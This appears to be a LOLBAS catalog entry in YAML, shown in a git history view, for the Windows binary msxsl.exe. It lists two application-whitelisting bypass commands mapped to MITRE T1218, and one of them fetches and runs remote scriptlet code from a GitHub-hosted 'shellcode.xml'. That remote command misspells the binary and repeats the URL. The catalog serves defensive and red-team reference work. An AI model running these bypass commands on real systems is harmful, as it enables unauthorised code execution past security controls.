LOLBAS/yml/OtherMSBinaries/Msxsl.yml

36 lines
1.3 KiB
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: msxsl.exe
Description: Command line utility used to perform XSL transformations.
Author: 'Oddvar Moe'
2018-06-09 00:15:06 +02:00
Created: '2018-05-25'
Commands:
- Command: msxsl.exe customers.xml script.xsl
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
2018-06-09 00:15:06 +02:00
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
2018-06-09 00:15:06 +02:00
Full Path:
- Path:
Code Sample:
- Code:
Detection:
- IOC:
2018-06-09 00:15:06 +02:00
Resources:
- Link: https://twitter.com/subTee/status/877616321747271680
- Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---